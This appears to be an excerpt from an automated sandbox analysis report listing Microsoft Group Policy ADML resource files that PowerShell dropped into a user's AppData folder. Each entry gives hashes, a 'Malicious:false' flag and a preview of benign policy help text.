                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2163
                                                                                          Entropy (8bit):4.8446705224824
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEThu85fKbISIiSPks6/jvY/wAibISvVviR0OlnIcBV:cgeD5x8gm8fK+oKWkx7v7SmVviBV
                                                                                          MD5:15395250ABFE245E09EDEA1B6537814E
                                                                                          SHA1:BCD13824A7D7E4DDDF9F7F60EEC6149D6F10F1D4
                                                                                          SHA-256:CADF1A1ED7AF5758824AC8A710730356758359E4CF0B61B989B76A3BA9DADFF0
                                                                                          SHA-512:6C4337CD68D38FC32E6AA4BEAB133AEC2E7F4DA435092F7359CAF6859E24B3FC2C6D1D9F19886DEE9F726CF1F3BD993F4FF9F1A9F626024EC593486E75B81216
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ExplorerFramePanePolicies">Explorer Frame Pane</string>.. <string id="PreviewPane">Turn on or off details pane</string>.. <string id="PreviewPane_DropDownList_Show">Always show</string>.. <string id="PreviewPane_DropDownList_Hide">Always hide</string>.. <string id="PreviewPane_help">This policy setting shows or hides the Details Pane in File Explorer.....If you enable this policy setting and configure it to hide the pane, the Details Pane in File Explorer is hidden and cannot be turned on by the

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GameExplorer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1897
                                                                                          Entropy (8bit):4.8809825480443285
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKl5wrZqMZDrABpO+ODR5/aAo19ArdFV:LeD5pmLGZqi4kRhaAo10dFV
                                                                                          MD5:85EE206DDBF793929AC0467A02312D46
                                                                                          SHA1:27550C4F8815DF919184B033AD36AD864CD5FA84
                                                                                          SHA-256:9F9F0778ABA650963783D793C7253CA72B4A7CEF436A4E34D4B5AEA6DD65BB95
                                                                                          SHA-512:B76B6D2E2F3B8B4B42CFD8B609EAAAEAC8B974C11D77CA00B5A32980C43EA9F415543D4C081F4E820D58D601A76EA098F01491820CEFD40E2766488923EAF889
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DownloadGameInfo">Turn off downloading of game information</string>.. <string id="DownloadGameInfo_Help">Manages download of game box art and ratings from the Windows Metadata Services.....If you enable this setting, game information including box art and ratings will not be downloaded. ....If you disable or do not configure this setting, game information will be downloaded from Windows Metadata Services.</string>.. <string id="GAMEUX">Game Explorer</string>.. <string id="ListRecentlyPlayed">Turn off

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Globalization.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (486), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):25531
                                                                                          Entropy (8bit):4.651678772761436
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:3G+fZ/NAlGQpr1EVa+3+O+kDeZCwFBAA5ykHj0Yz0hSxqGq0:W6NAlGQpr2oSDy5PGwPH
                                                                                          MD5:76A8A380A63A9348769B4A94D9EEF57F
                                                                                          SHA1:B20DFDC04FB839A890E83A590020CCF263EB338E
                                                                                          SHA-256:7FCB7F49FCEA58D4CFD70A65394DD7E7FD5404D7E51225FBB212035CEA78DF79
                                                                                          SHA-512:D9F454A57DEE30397CA8233DBD9EBD3E136FBE53B99D34572A04960B6C2785F3B1FECC914B580FA1C033A8952C4C072FF264FAFD1345EB76083B21E3C1482A61
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomLocalesNoSelect">Disallow selection of Custom Locales</string>.. <string id="CustomLocalesNoSelect_Help">This policy setting prevents a user from selecting a supplemental custom locale as their user locale. The user is restricted to the set of locales that are installed with the operating system.....This does not affect the selection of replacement locales. To prevent the selection of replacement locales, adjust the permissions of the %windir%\Globalization directory to prevent the installation of locale

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicy-Server.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (301), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1487
                                                                                          Entropy (8bit):4.93565859545614
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yczWOV1zWI6+xZAlxP84b6M119Z3icCV:cgeD5x8gm8fKmfg7I1/ZS9V
                                                                                          MD5:721DE72286ED158412B12054999D879D
                                                                                          SHA1:3E9668AD9CE409FC80B008D56BA0C213CEDD2B4B
                                                                                          SHA-256:A87BB0424E1D7DEF0F6D544530A32ABB9ED6D448969FEB8C5985F30E0FD71B65
                                                                                          SHA-512:A35D98E011DB3E0050FE3695F49576E2229F627D8A967907CB28B85A86762FD969D63CB89E4FE692CDA4B4F4211502F37B53C5C97FADC6A205E8174A63A9E285
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProcessTSUserLogonAsync">Allow asynchronous user Group Policy processing when logging on through Remote Desktop Services..</string>.. <string id="ProcessTSUserLogonAsync_Help">This policy setting allows Microsoft Windows to process user Group Policy settings asynchronously when logging on through Remote Desktop Services. Asynchronous user Group Policy processing is the default processing mode for Windows Vista and Windows XP.....By default, Window Server processes user Group Policy settings synchronously.....I

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicy.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (772), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60292
                                                                                          Entropy (8bit):4.712085259009764
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:eOZhoxHoAJPf9Op1fJDBRLPz5E/tW/4HnQ:eOZ+xIGAlBRLPz5E/8gw
                                                                                          MD5:3EC08BDFFA220598C2FE18E65DC57F55
                                                                                          SHA1:7E91322DA98DAA4F971A0CEEE5589D0AA601A40E
                                                                                          SHA-256:BF01A53E4DD9D9A982152BB2AF4F6B78DB2E6B26D0E3F80D192AC647FAFD3261
                                                                                          SHA-512:ED99C8F50AD90322E3844D63A29E573B6DE5ACA73A1C9111757B8331B6325BE9D9840D3C0945F124E058BDAB07A364360B4ECFEF14CB472487ECF6DBB7A7B606
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ResetDfsClientInfoDuringRefreshPolicy">Enable AD/DFS domain controller synchronization during policy refresh</string>.. <string id="ResetDfsClientInfoDuringRefreshPolicy_Help">Enabling this setting will cause the Group Policy Client to connect to the same domain controller for DFS shares as is being used for Active Directory.....</string>.. <string id="DisableAOACProcessing">Turn off Group Policy Client Service AOAC optimization</string>.. <string id="DisableAOACProcessing_Help">This policy setting p

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\GroupPolicyPreferences.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (500), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):133320
                                                                                          Entropy (8bit):4.822585844934633
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:TaSaHapabacaEa8aqapalasa4aMayauauaSa+awaOaW:Y
                                                                                          MD5:D1A5CF9F95B52D0C47DE6C6BBA860D0A
                                                                                          SHA1:112212D522046D296E4298AD5EEED40429FDAF28
                                                                                          SHA-256:D79EED1FFB6836C73A921B8BD79195F3787C17CB15CEB9E27D682F27DAEA3AEF
                                                                                          SHA-512:E79B6906D42A8F62A0D5B942C93C4A0A474DC6D841D7784D3EB49BDE7CA7B02F07E53D1DD2A0EE7D13974F9A9722F1A77A40C9F9A28F1DDF0955E46756F39034
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Group Policy Preference Policies</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="MMC_PrefApplications">Permit use of Application snap-ins</string>.. <string id="MMC_PrefApplications_Explain">This policy setting allows you to permit or prohibit use of Application snap-ins (Application preference item types). When prohibited, no Application preference item types appear when you attempt to create a new Application preference item, and you are unable to do so. This policy setting does not affect existing Application preference items.....If you enable or do not configure this policy setting, you permit use

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Help.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (399), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5647
                                                                                          Entropy (8bit):4.726995944697996
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmkwXl3Bnrvb+st3rnZay5gok2TyV+EJlNifb/j4mRMFW78v/xvJ9xvJ7V:EG+stjZ3gyIzNiz9MFWAn9np
                                                                                          MD5:3B1AD1ECF110F12067554FA487C740FD
                                                                                          SHA1:0EE520F7EC886C23F0A431AA690C851B5EB0C5A2
                                                                                          SHA-256:8DDB25B03AEAC60067CA82F72EDE2B7EBCEB1E48E196BAD69995C052FD2D2E86
                                                                                          SHA-512:F16103456D09B6385240E7A30FBC9909F0383D1611B08E9E3EB8407BA97E5F462DF7E127E5B8F04842F4A7F54E71D13C30675906624E41CF012AAA6EE06D8731
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HelpQualifiedRootDir_Comp">Restrict potentially unsafe HTML Help functions to specified folders</string>.. <string id="HelpQualifiedRootDir_Help">This policy setting allows you to restrict certain HTML Help commands to function only in HTML Help (.chm) files within specified folders and their subfolders. Alternatively, you can disable these commands on the entire system. It is strongly recommended that only folders requiring administrative privileges be added to this policy setting..... If you enable th

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\HelpAndSupport.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3089
                                                                                          Entropy (8bit):4.757831684112995
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5J8gmk3TikjDKO5a+A7nQK2N7nCgQ1XlD0J4qXCdCEJaN5Z7aexmFV:LeD5hm4TiADLcXnQvnzUt0JBznFmFV
                                                                                          MD5:FF9EF4C6BCE28ED5D6C68034CF5FB683
                                                                                          SHA1:9CD42425C65E031C5D535FD63B8A113FCE81923E
                                                                                          SHA-256:C121B0C89956299E7EA7212D382E199BDF50F51FE94634740934C56BAC669CAC
                                                                                          SHA-512:A86DB211B742DA417D886D1C77B22E82B4B25F84C961B7C4ADA3CB64216A35A21DDCD211B50251467E11EA234356516A1245768D5F266DC1F8F346EBC56F2B84
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Online Assistance</displayName>.. <description>Online Assistance</description>.. <resources>.. <stringTable>.. <string id="Assistance">Online Assistance</string>.. <string id="windowscomponents">Windows Components</string>.. <string id="ActiveHelpPolicy_Explain">This policy setting specifies whether active content links in trusted assistance content are rendered. By default, the Help viewer renders trusted assistance content with active elements such as ShellExecute links and Guided Help links.....If you enable this policy setting, active content links are not rendered. The text is displayed, but there are no clickable links for these elements.....If you disable or do not configu

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ICM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19360
                                                                                          Entropy (8bit):4.641124398915221
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:m7xEdYC8St0ugzNQmh2z31TCIXBtbL+jc98MK1X:zLtk27p1MMK1X
                                                                                          MD5:17CAE97BBE2A02C66C6FBDD54652B33E
                                                                                          SHA1:2CCB62039419D7D7D93EA8B04D7A3E587D80DC06
                                                                                          SHA-256:CAB1DD5C4B264CD58F17F3CD2C16775A7ABF379558F7506DD55FC363CA90C656
                                                                                          SHA-512:3ACB5C95A38AEB54C4FF0DD0735B6C0FEF4536EA22764455D16A90A0CC8A36655AD5E8E1D964429765818E06A15A90AE7AB4AA3EE556746235FA62C074C0B3C6
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CertMgr_DisableAutoRootUpdates">Turn off Automatic Root Certificates Update</string>.. <string id="CertMgr_DisableAutoRootUpdates_Help">This policy setting specifies whether to automatically update root certificates using the Windows Update website. ....Typically, a certificate is used when you use a secure website or when you send and receive secure email. Anyone can issue certificates, but to have transactions that are as secure as possible, certificates must be issued by a trusted certificate authority (CA)

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\IIS.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (743), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1408
                                                                                          Entropy (8bit):4.880333709783744
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y+kZDqGIZ0DafLMezn6FI2gFV:cgeD5x8gm8fKIZDqGTaYeeFcFV
                                                                                          MD5:426B83EC085AE7511EF7836624778786
                                                                                          SHA1:510FB2D8410021336EC73B9757A5E1A85FFA902B
                                                                                          SHA-256:73B3CBE01F0416F6DE28395E5B9AC286C8149D0F46BAB6AE86B6AC4E58B0F803
                                                                                          SHA-512:DECBFE7A847491E79F7CAD8AF64CDB650F82424CE657D44D8A8E9CF1BDFA413959DFD79349A88E8050EB6EB0715B4792AA2843E613A914C753A9211A07D2BF18
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="IIS">Internet Information Services</string>.. <string id="PreventIISInstall">Prevent IIS installation</string>.. <string id="PreventIISInstall_Help">"This policy setting prevents installation of Internet Information Services (IIS) on this computer. If you enable this policy setting, Internet Information Services (IIS) cannot be installed, and you will not be able to install Windows components or applications that require IIS. Users installing Windows components or applications that require IIS might not r

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\InetRes.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (592), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):457561
                                                                                          Entropy (8bit):4.747379761820279
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:4ShXU4YfsUgEI5zZxU6AECqP68pxJXljJX2G439MYe1t8ob:ZMk43i1t8u
                                                                                          MD5:10590CE50B19C233DDB6EEC95850C5F4
                                                                                          SHA1:0E8CD5C92654B4655E317521164FE17548AC9284
                                                                                          SHA-256:9775D601260260CA0BDB805FD89AA5C3C126B8706458404A2405711DFD708647
                                                                                          SHA-512:9DEC09DF0555B8106AE2D1FE2C6405672A995687EB03B8382D0A23EF36FD273980FC15D4194142107FAFC59A148039BE7DF0FB22A4F9FC1153C06BE04AE4D18A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="11.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="InternetCPL_Advanced_Accessibility">Accessibility</string>.. <string id="InternetCPL_Advanced_International">International</string>.. <string id="InternetCPL_Advanced_Security">Security</string>.. <string id="InternetCPL_Connections">Connections Page</string>.. <string id="InternetCPL_Content">Content Page</string>.. <string id="InternetCPL_Content_Certificates">Certificates</string>.. <string id="InternetCPL_General_Appearance">Appearance</string>.. <string id="InternetCPL_Gener

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\InkWatson.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (309), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1426
                                                                                          Entropy (8bit):4.787912997643585
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61y8p/L1u10pKiuruwuNez27BshruwlOALVIVriFV:cgeD5x8gm8fKb2gzp7Be7OA5OOFV
                                                                                          MD5:386AFC1D42FDA5DA7B89C46B35C02635
                                                                                          SHA1:44DC5FF2A570253D5AE1C755604DFFE11EF58022
                                                                                          SHA-256:3930ADC5CC37AC32F2C02C1C3F288CAD45F18DDB232D5226B78E9CF7632014C2
                                                                                          SHA-512:32AFFF54025D2A4C313228C41DFF6C2858877F5B0341F1950C822021DD2D13F1C6B70A43761EECB204AAB83762FC48BC6548B4D40A3746B5AC11C8240C973786
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PreventHandwritingErrorReports">Turn off handwriting recognition error reporting</string>.. <string id="PreventHandwritingErrorReports_Explain">Turns off the handwriting recognition error reporting tool.....The handwriting recognition error reporting tool enables users to report errors encountered in Tablet PC Input Panel. The tool generates error reports and transmits them to Microsoft over a secure connection. Microsoft uses these error reports to improve handwriting recognition in future versions of Windows

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\KDC.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (554), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10440
                                                                                          Entropy (8bit):4.663520278145665
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmaMIjP+dQzot5fZeuGnu9rAEQNsVS3sYgovZ4v/4euVuY9+UDVxgACCmskc:Ep8QzgfZeu1905teYUANOKIk
                                                                                          MD5:7783B0D4B182BE9230A649D6E8DC56AD
                                                                                          SHA1:215263A87F861BD2D8263BAD8011C5DDA0357BEB
                                                                                          SHA-256:DB2F6E21FDB453CD8E67C278038547D12EB5C58C1D0280776670D618AEDED64F
                                                                                          SHA-512:1B13DB33C12191ECF4687C6DEAF76E4776A10AAB045150C2A85369B0AA5553ECF42524A585A2A33905D1B124C1108FF2CACCDFE9C86D8CBBA89FD37E37F8D996
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>KDC Settings</displayName>.. <description>Configuration settings for the Kerberos Key Distribution Center.</description>.. <resources>.. <stringTable>.. <string id="KDC">KDC</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Key Distribution Center (KDC) searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the KDC will search the forests in this list if it is unable to resolve a two-part SPN in the local forest. The forest search is performed by using a glo

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Kerberos.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (840), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19138
                                                                                          Entropy (8bit):4.73754316262114
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:7atR7siAzz45FWuozQV/hI+DklrjMvJK1ORt:ebksWnzkhI19OL
                                                                                          MD5:AA29F707B1FE528F5F856EC64E771DAC
                                                                                          SHA1:6F3F897807668918B8A6F7C4E78B17AA445070F9
                                                                                          SHA-256:4148DF3125629ABE00141FACEF7519BBDE4D3877067A234F35C0A63B740810F6
                                                                                          SHA-512:4281194C43BF70E7839FF63107549994D8C89D211317E30557B366C32E30F58505F91AD17E8073869579C6EADA056D8973CD25A489D929FAF796CAE42F5A874E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Kerberos Settings</displayName>.. <description>Configuration settings for the Kerberos authentication protocol.</description>.. <resources>.. <stringTable>.. <string id="kerberos">Kerberos</string>.. <string id="forestsearch">Use forest search order</string>.. <string id="forestsearch_explain">This policy setting defines the list of trusting forests that the Kerberos client searches when attempting to resolve two-part service principal names (SPNs).....If you enable this policy setting, the Kerberos client searches the forests in this list, if it is unable to resolve a two-part SPN. If a match is found, the Kerberos client requests a re

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LanmanServer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6322
                                                                                          Entropy (8bit):4.728370721511469
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm8qDY/ixB4w28Divg6JR+CfREEM2eYJk2y3XTE68TpwQEOgRVLTMV:E9iUw2c0rUEk2yTEZpBmLg
                                                                                          MD5:33F09CDADA6D62BAE3F0DC0A3E1A2C2A
                                                                                          SHA1:62BEEE0D918637A68746741C74244FCF39D1A3FB
                                                                                          SHA-256:3393D80184E3C251A2E8249C13BBBE99A9045AD37550D8497D960371964BF8B7
                                                                                          SHA-512:DE12FA4C934B9A56C86FF7405D3DEBE1D8F3B4AB3ACDD419888FF2399FEDCABC42CFAF26EDA458C0B874D052327B1DC7BE8C454AA4DE0CF7C920F590C40C5BF0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_LanmanServer">Lanman Server</string>.. <string id="Lbl_FollowShare">Allow hash publication only for shared folders on which BranchCache is enabled</string>.. <string id="Lbl_DisableOnAllShares">Disallow hash publication on all shared folders</string>.. <string id="Lbl_EnableOnAllShares">Allow hash publication for all shared folders</string>.. <string id="Pol_HashPublication">Hash Publication for BranchCache</string>.. <string id="Pol_HashPublication_Help">This policy setting specifies w

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\LeakDiagnostic.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1590
                                                                                          Entropy (8bit):4.91680451974178
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKbXSr4eKUsXZ3W5/1n0BsIvFV:LeD5pmnCr4QCW1hCsIvFV
                                                                                          MD5:FAB2C03A061CF266E4BF99D9AD8410CC
                                                                                          SHA1:62C30ED88810E558C2C5B29DF833E0B84979F798
                                                                                          SHA-256:1FAD47D1BCFC5110370B1E428F800DD67B65037C2C029C39355D1F0AF51B4712
                                                                                          SHA-512:2B49196BE14CD1493F98BB4294D50CE42481D67A02357FD6F26067588B4D19B96D7D6677E5A3B6DA5A99329B7422BD5C257C591CBD6C773E5A106EE47E6A2909
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Memory Leak Diagnosis</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting determines whether Diagnostic Policy Service (DPS) diagnoses memory leak problems.....If you enable or do not configure this policy setting, the DPS enables Windows Memory Leak Diagnosis by default.....If you disable this policy setting, the DPS is not able to diagnose memory leak problems.....

